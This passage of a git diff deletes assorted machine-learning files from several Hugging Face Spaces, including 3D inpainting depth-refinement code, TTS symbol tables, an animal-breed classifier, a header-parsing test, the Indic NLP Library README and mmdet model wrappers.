0).astype(np.uint8), connectivity=8) - if num_end_group == 1: - continue - for end_id in range(1, num_end_group): - end_pxs, end_pys = np.where((end_group == end_id)) - end_px, end_py = end_pxs[0], end_pys[0] - other_edges_info.append({}) - other_edges_info[-1]['edge_id'] = edge_id - # other_edges_info[-1]['near_depth'] = None - other_edges_info[-1]['diff'] = None - other_edges_info[-1]['edge_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['end_point_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['end_point_map'][(end_group == end_id)] = 1 - other_edges_info[-1]['forbidden_point_map'] = np.zeros_like(self_edge) - other_edges_info[-1]['forbidden_point_map'][(end_group != end_id) * (end_group != 0)] = 1 - other_edges_info[-1]['forbidden_point_map'] = cv2.dilate(other_edges_info[-1]['forbidden_point_map'], kernel=np.array([[1,1,1],[1,1,1],[1,1,1]]), iterations=2) - for x in edge_ccs[edge_id]: - nx = x[0] - anchor[0] - ny = x[1] - anchor[1] - if nx == end_px and ny == end_py: - # other_edges_info[-1]['near_depth'] = abs(nx) - if mesh.nodes[x].get('far') is not None and len(mesh.nodes[x].get('far')) == 1: - other_edges_info[-1]['diff'] = abs(1./abs([*mesh.nodes[x].get('far')][0][2]) - 1./abs(x[2])) - else: - other_edges_info[-1]['diff'] 
= 0 - # if end_group[nx, ny] != end_id and end_group[nx, ny] > 0: - # continue - try: - if isolate_condition[nx, ny] == 1: - other_edges_info[-1]['edge_map'][nx, ny] = 1 - except: - pass - try: - other_edges_info = sorted(other_edges_info, key=lambda x : x['diff'], reverse=True) - except: - import pdb - pdb.set_trace() - # import pdb - # pdb.set_trace() - # other_edges = other_edges[..., None] - for other_edge in other_edges_info: - if other_edge['end_point_map'] is None: - import pdb - pdb.set_trace() - - other_edges = other_edges * context - - return other_edges, other_edges_info - -def require_depth_edge(context_edge, mask): - dilate_mask = cv2.dilate(mask, np.array([[1,1,1],[1,1,1],[1,1,1]]).astype(np.uint8), iterations=1) - if (dilate_mask * context_edge).max() == 0: - return False - else: - return True - -def refine_color_around_edge(mesh, info_on_pix, edge_ccs, config, spdb=False): - H, W = mesh.graph['H'], mesh.graph['W'] - tmp_edge_ccs = copy.deepcopy(edge_ccs) - for edge_id, edge_cc in enumerate(edge_ccs): - if len(edge_cc) == 0: - continue - near_maps = np.zeros((H, W)).astype(np.bool) - far_maps = np.zeros((H, W)).astype(np.bool) - tmp_far_nodes = set() - far_nodes = set() - near_nodes = set() - end_nodes = set() - for i in range(5): - if i == 0: - for edge_node in edge_cc: - if mesh.nodes[edge_node].get('depth_edge_dilate_2_color_flag') is not True: - break - if mesh.nodes[edge_node].get('inpaint_id') == 1: - near_nodes.add(edge_node) - tmp_node = mesh.nodes[edge_node].get('far') - tmp_node = set(tmp_node) if tmp_node is not None else set() - tmp_far_nodes |= tmp_node - rmv_tmp_far_nodes = set() - for far_node in tmp_far_nodes: - if not(mesh.has_node(far_node) and mesh.nodes[far_node].get('inpaint_id') == 1): - rmv_tmp_far_nodes.add(far_node) - if len(tmp_far_nodes - rmv_tmp_far_nodes) == 0: - break - else: - for near_node in near_nodes: - near_maps[near_node[0], near_node[1]] = True - mesh.nodes[near_node]['refine_rgbd'] = True - mesh.nodes[near_node]['backup_depth'] = near_node[2] \ - if mesh.nodes[near_node].get('real_depth') is None else mesh.nodes[near_node]['real_depth'] - mesh.nodes[near_node]['backup_color'] = mesh.nodes[near_node]['color'] - for far_node in tmp_far_nodes: - if mesh.has_node(far_node) and mesh.nodes[far_node].get('inpaint_id') == 1: - far_nodes.add(far_node) - far_maps[far_node[0], far_node[1]] = True - mesh.nodes[far_node]['refine_rgbd'] = True - mesh.nodes[far_node]['backup_depth'] = far_node[2] \ - if mesh.nodes[far_node].get('real_depth') is None else mesh.nodes[far_node]['real_depth'] - mesh.nodes[far_node]['backup_color'] = mesh.nodes[far_node]['color'] - tmp_far_nodes = far_nodes - tmp_near_nodes = near_nodes - else: - tmp_far_nodes = new_tmp_far_nodes - tmp_near_nodes = new_tmp_near_nodes - new_tmp_far_nodes = None - new_tmp_near_nodes = None - new_tmp_far_nodes = set() - new_tmp_near_nodes = set() - for node in tmp_near_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and \ - near_maps[ne_node[0], ne_node[1]] == False: - if mesh.nodes[ne_node].get('inpaint_id') == 1: - new_tmp_near_nodes.add(ne_node) - near_maps[ne_node[0], ne_node[1]] = True - mesh.nodes[ne_node]['refine_rgbd'] = True - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - else: - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is 
None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - end_nodes.add(node) - near_nodes.update(new_tmp_near_nodes) - for node in tmp_far_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and \ - near_maps[ne_node[0], ne_node[1]] == False: - if mesh.nodes[ne_node].get('inpaint_id') == 1: - new_tmp_far_nodes.add(ne_node) - far_maps[ne_node[0], ne_node[1]] = True - mesh.nodes[ne_node]['refine_rgbd'] = True - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - else: - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - end_nodes.add(node) - far_nodes.update(new_tmp_far_nodes) - if len(far_nodes) == 0: - tmp_edge_ccs[edge_id] = set() - continue - for node in new_tmp_far_nodes | new_tmp_near_nodes: - for ne_node in mesh.neighbors(node): - if far_maps[ne_node[0], ne_node[1]] == False and near_maps[ne_node[0], ne_node[1]] == False: - end_nodes.add(node) - mesh.nodes[ne_node]['backup_depth'] = ne_node[2] \ - if mesh.nodes[ne_node].get('real_depth') is None else mesh.nodes[ne_node]['real_depth'] - mesh.nodes[ne_node]['backup_color'] = mesh.nodes[ne_node]['color'] - tmp_end_nodes = end_nodes - - refine_nodes = near_nodes | far_nodes - remain_refine_nodes = copy.deepcopy(refine_nodes) - accum_idx = 0 - while len(remain_refine_nodes) > 0: - accum_idx += 1 - if accum_idx > 100: - break - new_tmp_end_nodes = None - new_tmp_end_nodes = set() - survive_tmp_end_nodes = set() - for node in tmp_end_nodes: - re_depth, re_color, re_count = 0, np.array([0., 0., 0.]), 0 - for ne_node in mesh.neighbors(node): - if mesh.nodes[ne_node].get('refine_rgbd') is True: - if ne_node not in tmp_end_nodes: - new_tmp_end_nodes.add(ne_node) - else: - try: - re_depth += mesh.nodes[ne_node]['backup_depth'] - re_color += mesh.nodes[ne_node]['backup_color'].astype(np.float32) - re_count += 1. 
- except: - import pdb; pdb.set_trace() - if re_count > 0: - re_depth = re_depth / re_count - re_color = re_color / re_count - mesh.nodes[node]['backup_depth'] = re_depth - mesh.nodes[node]['backup_color'] = re_color - mesh.nodes[node]['refine_rgbd'] = False - else: - survive_tmp_end_nodes.add(node) - for node in tmp_end_nodes - survive_tmp_end_nodes: - if node in remain_refine_nodes: - remain_refine_nodes.remove(node) - tmp_end_nodes = new_tmp_end_nodes - if spdb == True: - bfrd_canvas = np.zeros((H, W)) - bfrc_canvas = np.zeros((H, W, 3)).astype(np.uint8) - aftd_canvas = np.zeros((H, W)) - aftc_canvas = np.zeros((H, W, 3)).astype(np.uint8) - for node in refine_nodes: - bfrd_canvas[node[0], node[1]] = abs(node[2]) - aftd_canvas[node[0], node[1]] = abs(mesh.nodes[node]['backup_depth']) - bfrc_canvas[node[0], node[1]] = mesh.nodes[node]['color'].astype(np.uint8) - aftc_canvas[node[0], node[1]] = mesh.nodes[node]['backup_color'].astype(np.uint8) - f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, sharex=True, sharey=True); - ax1.imshow(bfrd_canvas); - ax2.imshow(aftd_canvas); - ax3.imshow(bfrc_canvas); - ax4.imshow(aftc_canvas); - plt.show() - import pdb; pdb.set_trace() - for node in refine_nodes: - if mesh.nodes[node].get('refine_rgbd') is not None: - mesh.nodes[node].pop('refine_rgbd') - mesh.nodes[node]['color'] = mesh.nodes[node]['backup_color'] - for info in info_on_pix[(node[0], node[1])]: - if info['depth'] == node[2]: - info['color'] = mesh.nodes[node]['backup_color'] - - return mesh, info_on_pix - -def refine_depth_around_edge(mask_depth, far_edge, uncleaned_far_edge, near_edge, mask, all_depth, config): - if isinstance(mask_depth, torch.Tensor): - if mask_depth.is_cuda: - mask_depth = mask_depth.cpu() - mask_depth = mask_depth.data - mask_depth = mask_depth.numpy() - if isinstance(far_edge, torch.Tensor): - if far_edge.is_cuda: - far_edge = far_edge.cpu() - far_edge = far_edge.data - far_edge = far_edge.numpy() - if isinstance(uncleaned_far_edge, torch.Tensor): - if uncleaned_far_edge.is_cuda: - uncleaned_far_edge = uncleaned_far_edge.cpu() - uncleaned_far_edge = uncleaned_far_edge.data - uncleaned_far_edge = uncleaned_far_edge.numpy() - if isinstance(near_edge, torch.Tensor): - if near_edge.is_cuda: - near_edge = near_edge.cpu() - near_edge = near_edge.data - near_edge = near_edge.numpy() - if isinstance(mask, torch.Tensor): - if mask.is_cuda: - mask = mask.cpu() - mask = mask.data - mask = mask.numpy() - mask = mask.squeeze() - uncleaned_far_edge = uncleaned_far_edge.squeeze() - far_edge = far_edge.squeeze() - near_edge = near_edge.squeeze() - mask_depth = mask_depth.squeeze() - dilate_far_edge = cv2.dilate(uncleaned_far_edge.astype(np.uint8), kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - near_edge[dilate_far_edge == 0] = 0 - dilate_near_edge = cv2.dilate(near_edge.astype(np.uint8), kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - far_edge[dilate_near_edge == 0] = 0 - init_far_edge = far_edge.copy() - init_near_edge = near_edge.copy() - for i in range(config['depth_edge_dilate_2']): - init_far_edge = cv2.dilate(init_far_edge, kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - init_far_edge[init_near_edge == 1] = 0 - init_near_edge = cv2.dilate(init_near_edge, kernel=np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - init_near_edge[init_far_edge == 1] = 0 - init_far_edge[mask == 0] = 0 - init_near_edge[mask == 0] = 0 - hole_far_edge = 1 - init_far_edge - hole_near_edge = 1 - 
init_near_edge - change = None - while True: - change = False - hole_far_edge[init_near_edge == 1] = 0 - hole_near_edge[init_far_edge == 1] = 0 - far_pxs, far_pys = np.where((hole_far_edge == 0) * (init_far_edge == 1) > 0) - current_hole_far_edge = hole_far_edge.copy() - for far_px, far_py in zip(far_pxs, far_pys): - min_px = max(far_px - 1, 0) - max_px = min(far_px + 2, mask.shape[0]-1) - min_py = max(far_py - 1, 0) - max_py = min(far_py + 2, mask.shape[1]-1) - hole_far = current_hole_far_edge[min_px: max_px, min_py: max_py] - tmp_mask = mask[min_px: max_px, min_py: max_py] - all_depth_patch = all_depth[min_px: max_px, min_py: max_py] * 0 - all_depth_mask = (all_depth_patch != 0).astype(np.uint8) - cross_element = np.array([[0,1,0],[1,1,1],[0,1,0]])[min_px - (far_px - 1): max_px - (far_px - 1), min_py - (far_py - 1): max_py - (far_py - 1)] - combine_mask = (tmp_mask + all_depth_mask).clip(0, 1) * hole_far * cross_element - tmp_patch = combine_mask * (mask_depth[min_px: max_px, min_py: max_py] + all_depth_patch) - number = np.count_nonzero(tmp_patch) - if number > 0: - mask_depth[far_px, far_py] = np.sum(tmp_patch).astype(np.float32) / max(number, 1e-6) - hole_far_edge[far_px, far_py] = 1 - change = True - near_pxs, near_pys = np.where((hole_near_edge == 0) * (init_near_edge == 1) > 0) - current_hole_near_edge = hole_near_edge.copy() - for near_px, near_py in zip(near_pxs, near_pys): - min_px = max(near_px - 1, 0) - max_px = min(near_px + 2, mask.shape[0]-1) - min_py = max(near_py - 1, 0) - max_py = min(near_py + 2, mask.shape[1]-1) - hole_near = current_hole_near_edge[min_px: max_px, min_py: max_py] - tmp_mask = mask[min_px: max_px, min_py: max_py] - all_depth_patch = all_depth[min_px: max_px, min_py: max_py] * 0 - all_depth_mask = (all_depth_patch != 0).astype(np.uint8) - cross_element = np.array([[0,1,0],[1,1,1],[0,1,0]])[min_px - near_px + 1:max_px - near_px + 1, min_py - near_py + 1:max_py - near_py + 1] - combine_mask = (tmp_mask + all_depth_mask).clip(0, 1) * hole_near * cross_element - tmp_patch = combine_mask * (mask_depth[min_px: max_px, min_py: max_py] + all_depth_patch) - number = np.count_nonzero(tmp_patch) - if number > 0: - mask_depth[near_px, near_py] = np.sum(tmp_patch) / max(number, 1e-6) - hole_near_edge[near_px, near_py] = 1 - change = True - if change is False: - break - - return mask_depth - - - -def vis_depth_edge_connectivity(depth, config): - disp = 1./depth - u_diff = (disp[1:, :] - disp[:-1, :])[:-1, 1:-1] - b_diff = (disp[:-1, :] - disp[1:, :])[1:, 1:-1] - l_diff = (disp[:, 1:] - disp[:, :-1])[1:-1, :-1] - r_diff = (disp[:, :-1] - disp[:, 1:])[1:-1, 1:] - u_over = (np.abs(u_diff) > config['depth_threshold']).astype(np.float32) - b_over = (np.abs(b_diff) > config['depth_threshold']).astype(np.float32) - l_over = (np.abs(l_diff) > config['depth_threshold']).astype(np.float32) - r_over = (np.abs(r_diff) > config['depth_threshold']).astype(np.float32) - concat_diff = np.stack([u_diff, b_diff, r_diff, l_diff], axis=-1) - concat_over = np.stack([u_over, b_over, r_over, l_over], axis=-1) - over_diff = concat_diff * concat_over - pos_over = (over_diff > 0).astype(np.float32).sum(-1).clip(0, 1) - neg_over = (over_diff < 0).astype(np.float32).sum(-1).clip(0, 1) - neg_over[(over_diff > 0).astype(np.float32).sum(-1) > 0] = 0 - _, edge_label = cv2.connectedComponents(pos_over.astype(np.uint8), connectivity=8) - T_junction_maps = np.zeros_like(pos_over) - for edge_id in range(1, edge_label.max() + 1): - edge_map = (edge_label == edge_id).astype(np.uint8) - edge_map = 
np.pad(edge_map, pad_width=((1,1),(1,1)), mode='constant') - four_direc = np.roll(edge_map, 1, 1) + np.roll(edge_map, -1, 1) + np.roll(edge_map, 1, 0) + np.roll(edge_map, -1, 0) - eight_direc = np.roll(np.roll(edge_map, 1, 1), 1, 0) + np.roll(np.roll(edge_map, 1, 1), -1, 0) + \ - np.roll(np.roll(edge_map, -1, 1), 1, 0) + np.roll(np.roll(edge_map, -1, 1), -1, 0) - eight_direc = (eight_direc + four_direc)[1:-1,1:-1] - pos_over[eight_direc > 2] = 0 - T_junction_maps[eight_direc > 2] = 1 - _, edge_label = cv2.connectedComponents(pos_over.astype(np.uint8), connectivity=8) - edge_label = np.pad(edge_label, 1, mode='constant') - - return edge_label - - - -def max_size(mat, value=0): - if not (mat and mat[0]): return (0, 0) - it = iter(mat) - prev = [(el==value) for el in next(it)] - max_size = max_rectangle_size(prev) - for row in it: - hist = [(1+h) if el == value else 0 for h, el in zip(prev, row)] - max_size = max(max_size, max_rectangle_size(hist), key=get_area) - prev = hist - return max_size - -def max_rectangle_size(histogram): - Info = namedtuple('Info', 'start height') - stack = [] - top = lambda: stack[-1] - max_size = (0, 0) # height, width of the largest rectangle - pos = 0 # current position in the histogram - for pos, height in enumerate(histogram): - start = pos # position where rectangle starts - while True: - if not stack or height > top().height: - stack.append(Info(start, height)) # push - if stack and height < top().height: - max_size = max(max_size, (top().height, (pos-top().start)), - key=get_area) - start, _ = stack.pop() - continue - break # height == top().height goes here - - pos += 1 - for start, height in stack: - max_size = max(max_size, (height, (pos-start)), - key=get_area) - - return max_size - -def get_area(size): - return reduce(mul, size) - -def find_anchors(matrix): - matrix = [[*x] for x in matrix] - mh, mw = max_size(matrix) - matrix = np.array(matrix) - # element = np.zeros((mh, mw)) - for i in range(matrix.shape[0] + 1 - mh): - for j in range(matrix.shape[1] + 1 - mw): - if matrix[i:i + mh, j:j + mw].max() == 0: - return i, i + mh, j, j + mw - -def find_largest_rect(dst_img, bg_color=(128, 128, 128)): - valid = np.any(dst_img[..., :3] != bg_color, axis=-1) - dst_h, dst_w = dst_img.shape[:2] - ret, labels = cv2.connectedComponents(np.uint8(valid == False)) - red_mat = np.zeros_like(labels) - # denoise - for i in range(1, np.max(labels)+1, 1): - x, y, w, h = cv2.boundingRect(np.uint8(labels==i)) - if x == 0 or (x+w) == dst_h or y == 0 or (y+h) == dst_w: - red_mat[labels==i] = 1 - # crop - t, b, l, r = find_anchors(red_mat) - - return t, b, l, r diff --git a/spaces/Jarvis2301/Aku/text/symbols.py b/spaces/Jarvis2301/Aku/text/symbols.py deleted file mode 100644 index 0b26482ce8f44c3b22ef46198fdb92dce11a4e16..0000000000000000000000000000000000000000 --- a/spaces/Jarvis2301/Aku/text/symbols.py +++ /dev/null @@ -1,39 +0,0 @@ -''' -Defines the set of symbols used in text input to the model. 
-''' - -# japanese_cleaners -_pad = '_' -_punctuation = ',.!?-' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧ↓↑ ' - - -# japanese_cleaners2 -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧʦ↓↑ ' - - -# korean_cleaners -_pad = '_' -_punctuation = ',.!?…~' -_letters = 'ㄱㄴㄷㄹㅁㅂㅅㅇㅈㅊㅋㅌㅍㅎㄲㄸㅃㅆㅉㅏㅓㅗㅜㅡㅣㅐㅔ ' - - -# chinese_cleaners -_pad = '_' -_punctuation = ',。!?—…' -_letters = 'ㄅㄆㄇㄈㄉㄊㄋㄌㄍㄎㄏㄐㄑㄒㄓㄔㄕㄖㄗㄘㄙㄚㄛㄜㄝㄞㄟㄠㄡㄢㄣㄤㄥㄦㄧㄨㄩˉˊˇˋ˙ ' - - -# zh_ja_mixture_cleaners -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijklmnoprstuvwyzʃʧʦɯɹəɥ⁼ʰ`→↓↑ ' - - -# Export all symbols: -symbols = [_pad] + list(_punctuation) + list(_letters) - -# Special symbol ids -SPACE_ID = symbols.index(" ") \ No newline at end of file diff --git a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py b/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py deleted file mode 100644 index 2fb54d71aff130affeee0a290f0a0a8fccc74421..0000000000000000000000000000000000000000 --- a/spaces/JohnCalimoso/animalbreedidentificationversion1.5/Control/Guineapig/con_guineapig_ensemble.py +++ /dev/null @@ -1,37 +0,0 @@ -import cv2 -import numpy as np -from PIL import Image -import pickle -import tensorflow as tf -import io - -class gpEnsemble: - def __init__(self,url) -> None: - self.image = url - - def predict_image(self): - # Load the model - load_extractor = tf.keras.models.load_model("././Model/Guineapig/ensemble/resnet_EXTRACTOR.h5") - - modelpath = "././Model/Guineapig/ensemble/dataSaved.pkl" - - with open(modelpath, 'rb') as file: - saved_data = pickle.load(file) - animal_breed = saved_data['class_name'] - model = saved_data['logreg_svm_model'] - - im = Image.open(self.image) - img = im.convert("RGB") - img= np.asarray(img) - image_resized= cv2.resize(img, (224,224)) - features = load_extractor.predict(np.expand_dims(image_resized, axis=0)) - - reshaped_features = features.reshape(features.shape[0],-1) - predicted_class = model.predict(reshaped_features) - pred_prob = model.predict_proba(reshaped_features)[:2] - prediction_probability = pred_prob[0][predicted_class[0]] - predicted_class - - output_class= animal_breed[predicted_class[0]] - - return [output_class, prediction_probability] diff --git a/spaces/KPCGD/bingo/tests/parse.ts b/spaces/KPCGD/bingo/tests/parse.ts deleted file mode 100644 index 92940fe6315f1d7cb2b267ba5e5a7e26460a1de3..0000000000000000000000000000000000000000 --- a/spaces/KPCGD/bingo/tests/parse.ts +++ /dev/null @@ -1,13 +0,0 @@ -import { promises as fs } from 'fs' -import { join } from 'path' -import { parseHeadersFromCurl } from '@/lib/utils' - -(async () => { - const content = await fs.readFile(join(__dirname, './fixtures/curl.txt'), 'utf-8') - const headers = parseHeadersFromCurl(content) - console.log(headers) - - const cmdContent = await fs.readFile(join(__dirname, './fixtures/cmd.txt'), 'utf-8') - const cmdHeaders = parseHeadersFromCurl(cmdContent) - console.log(cmdHeaders) -})() diff --git a/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py b/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py deleted file mode 100644 index 4287ca8617970fa8fc025b75cb319c7032706910..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/ChatGPT-with-Voice-Cloning-in-Chinese/ppg2mel/train/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# \ No newline at end of file diff --git a/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md 
b/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md deleted file mode 100644 index 0b7f8a82798e3ee874f8f838a635f89290d3e47e..0000000000000000000000000000000000000000 --- a/spaces/Kimata/Sanskrit-TTS/indic_nlp_library/README.md +++ /dev/null @@ -1,142 +0,0 @@ -# Indic NLP Library - -The goal of the Indic NLP Library is to build Python based libraries for common text processing and Natural Language Processing in Indian languages. Indian languages share a lot of similarity in terms of script, phonology, language syntax, etc. and this library is an attempt to provide a general solution to very commonly required toolsets for Indian language text. - -The library provides the following functionalities: - -- Text Normalization -- Script Information -- Word Tokenization and Detokenization -- Sentence Splitting -- Word Segmentation -- Syllabification -- Script Conversion -- Romanization -- Indicization -- Transliteration -- Translation - -The data resources required by the Indic NLP Library are hosted in a different repository. These resources are required for some modules. You can download from the [Indic NLP Resources](https://github.com/anoopkunchukuttan/indic_nlp_resources) project. - -**If you are interested in Indian language NLP resources, you should check the [Indic NLP Catalog](https://github.com/indicnlpweb/indicnlp_catalog) for pointers.** - -## Pre-requisites - -- Python 3.x - - (For Python 2.x version check the tag `PYTHON_2.7_FINAL_JAN_2019`. Not actively supporting Python 2.x anymore, but will try to maintain as much compatibility as possible) -- [Indic NLP Resources](https://github.com/anoopkunchukuttan/indic_nlp_resources) -- [Urduhack](https://github.com/urduhack/urduhack): Needed only if Urdu normalization is required. It has other dependencies like Tensorflow. -- Other dependencies are listed in setup.py - - -## Configuration - -- Installation from pip: - - `pip install indic-nlp-library` - -- If you want to use the project from the github repo, add the project to the Python Path: - - - Clone this repository - - Install dependencies: `pip install -r requirements.txt` - - Run: `export PYTHONPATH=$PYTHONPATH:` - -- In either case, export the path to the _Indic NLP Resources_ directory - - Run: `export INDIC_RESOURCES_PATH=` - -## Usage - -You can use the Python API to access all the features of the library. Many of the most common operations are also accessible via a unified commandline API. - -### Getting Started - -Check [this IPython Notebook](http://nbviewer.ipython.org/url/anoopkunchukuttan.github.io/indic_nlp_library/doc/indic_nlp_examples.ipynb) for examples to use the Python API. - - You can find the Python 2.x Notebook [here](http://nbviewer.ipython.org/url/anoopkunchukuttan.github.io/indic_nlp_library/doc/indic_nlp_examples_2_7.ipynb) - -### Documentation - -You can find detailed documentation [HERE](https://indic-nlp-library.readthedocs.io/en/latest) - -This documents the Python API as well as the commandline reference. 
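For quick reference, here is a short sketch of typical Python API usage covering normalization, tokenization and script conversion, assuming the Indic NLP Resources have already been downloaded as described above; the resource path below is a placeholder, and the notebook linked earlier remains the authoritative set of examples.

```python
# Minimal usage sketch (resource path is a placeholder; see the example notebook for the full API).
from indicnlp import common, loader

# Point the library at the downloaded Indic NLP Resources, then load them.
common.set_resources_path('/path/to/indic_nlp_resources')
loader.load()

# Normalize Hindi (Devanagari) text.
from indicnlp.normalize.indic_normalize import IndicNormalizerFactory
normalizer = IndicNormalizerFactory().get_normalizer('hi')
text = normalizer.normalize('यह एक उदाहरण वाक्य है ।')

# Tokenize into words and punctuation.
from indicnlp.tokenize import indic_tokenize
tokens = indic_tokenize.trivial_tokenize(text, lang='hi')

# Convert the text from Devanagari to Tamil script.
from indicnlp.transliterate.unicode_transliterate import UnicodeIndicTransliterator
tamil_text = UnicodeIndicTransliterator.transliterate(text, 'hi', 'ta')

print(tokens)
print(tamil_text)
```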
- -## Citing - -If you use this library, please include the following citation: - -``` -@misc{kunchukuttan2020indicnlp, -author = "Anoop Kunchukuttan", -title = "{The IndicNLP Library}", -year = "2020", -howpublished={\url{https://github.com/anoopkunchukuttan/indic_nlp_library/blob/master/docs/indicnlp.pdf}} -} -``` -You can find the document [HERE](docs/indicnlp.pdf) - -## Website - -`http://anoopkunchukuttan.github.io/indic_nlp_library` - -## Author -Anoop Kunchukuttan ([anoop.kunchukuttan@gmail.com](anoop.kunchukuttan@gmail.com)) - -## Companies, Organizations, Projects using IndicNLP Library - -- [AI4Bharat-IndicNLPSuite](https://indicnlp.ai4bharat.org) -- [The Classical Language Toolkit](http://cltk.org) -- [Microsoft NLP Recipes](https://github.com/microsoft/nlp-recipes) -- [Facebook M2M-100](https://github.com/pytorch/fairseq/tree/master/examples/m2m_100) - -## Revision Log - - -0.81 : 26 May 2021 - - - Bug fix in version number extraction - -0.80 : 24 May 2021 - - - Improved sentence splitting - - Bug fixes - - Support for Urdu Normalizer - -0.71 : 03 Sep 2020 - - - Improved documentation - - Bug fixes - -0.7 : 02 Apr 2020: - - - Unified commandline - - Improved documentation - - Added setup.py - -0.6 : 16 Dec 2019: - - - New romanizer and indicizer - - Script Unifiers - - Improved script normalizers - - Added contrib directory for sample uses - - changed to MIT license - -0.5 : 03 Jun 2019: - - - Improved word tokenizer to handle dates and numbers. - - Added sentence splitter that can handle common prefixes/honorofics and uses some heuristics. - - Added detokenizer - - Added acronym transliterator that can convert English acronyms to Brahmi-derived scripts - -0.4 : 28 Jan 2019: Ported to Python 3, and lots of feature additions since last release; primarily around script information, script similarity and syllabification. - -0.3 : 21 Oct 2014: Supports morph-analysis between Indian languages - -0.2 : 13 Jun 2014: Supports transliteration between Indian languages and tokenization of Indian languages - -0.1 : 12 Mar 2014: Initial version. Supports text normalization. - -## LICENSE - -Indic NLP Library is released under the MIT license - - diff --git a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py b/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py deleted file mode 100644 index 4f38ef44e482039fdf7476d048eee5df2a96fd9b..0000000000000000000000000000000000000000 --- a/spaces/KyanChen/RSPrompter/mmdet/models/detectors/mask2former.py +++ /dev/null @@ -1,30 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-from mmdet.registry import MODELS -from mmdet.utils import ConfigType, OptConfigType, OptMultiConfig -from .maskformer import MaskFormer - - -@MODELS.register_module() -class Mask2Former(MaskFormer): - r"""Implementation of `Masked-attention Mask - Transformer for Universal Image Segmentation - `_.""" - - def __init__(self, - backbone: ConfigType, - neck: OptConfigType = None, - panoptic_head: OptConfigType = None, - panoptic_fusion_head: OptConfigType = None, - train_cfg: OptConfigType = None, - test_cfg: OptConfigType = None, - data_preprocessor: OptConfigType = None, - init_cfg: OptMultiConfig = None): - super().__init__( - backbone=backbone, - neck=neck, - panoptic_head=panoptic_head, - panoptic_fusion_head=panoptic_fusion_head, - train_cfg=train_cfg, - test_cfg=test_cfg, - data_preprocessor=data_preprocessor, - init_cfg=init_cfg) diff --git a/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py b/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py deleted file mode 100644 index 55436f358ae708827d40a49b7d991da60bb89b39..0000000000000000000000000000000000000000 --- a/spaces/Laihiujin/OneFormer/oneformer/modeling/pixel_decoder/ops/modules/ms_deform_attn.py +++ /dev/null @@ -1,129 +0,0 @@ -# ------------------------------------------------------------------------------------------------ -# Deformable DETR -# Copyright (c) 2020 SenseTime. All Rights Reserved. -# Licensed under the Apache License, Version 2.0 [see LICENSE for details] -# ------------------------------------------------------------------------------------------------ -# Modified from https://github.com/chengdazhi/Deformable-Convolution-V2-PyTorch/tree/pytorch_1.0.0 -# ------------------------------------------------------------------------------------------------ - -# Copyright (c) Facebook, Inc. and its affiliates. 
-# Modified by Bowen Cheng from https://github.com/fundamentalvision/Deformable-DETR - -from __future__ import absolute_import -from __future__ import print_function -from __future__ import division - -import warnings -import math - -import torch -from torch import nn -import torch.nn.functional as F -from torch.nn.init import xavier_uniform_, constant_ - -if torch.cuda.is_available(): - from ..functions import MSDeformAttnFunction -else: - MSDeformAttnFunction = None -from ..functions.ms_deform_attn_func import ms_deform_attn_core_pytorch - - -def _is_power_of_2(n): - if (not isinstance(n, int)) or (n < 0): - raise ValueError("invalid input for _is_power_of_2: {} (type: {})".format(n, type(n))) - return (n & (n-1) == 0) and n != 0 - - -class MSDeformAttn(nn.Module): - def __init__(self, d_model=256, n_levels=4, n_heads=8, n_points=4): - """ - Multi-Scale Deformable Attention Module - :param d_model hidden dimension - :param n_levels number of feature levels - :param n_heads number of attention heads - :param n_points number of sampling points per attention head per feature level - """ - super().__init__() - if d_model % n_heads != 0: - raise ValueError('d_model must be divisible by n_heads, but got {} and {}'.format(d_model, n_heads)) - _d_per_head = d_model // n_heads - # you'd better set _d_per_head to a power of 2 which is more efficient in our CUDA implementation - if not _is_power_of_2(_d_per_head): - warnings.warn("You'd better set d_model in MSDeformAttn to make the dimension of each attention head a power of 2 " - "which is 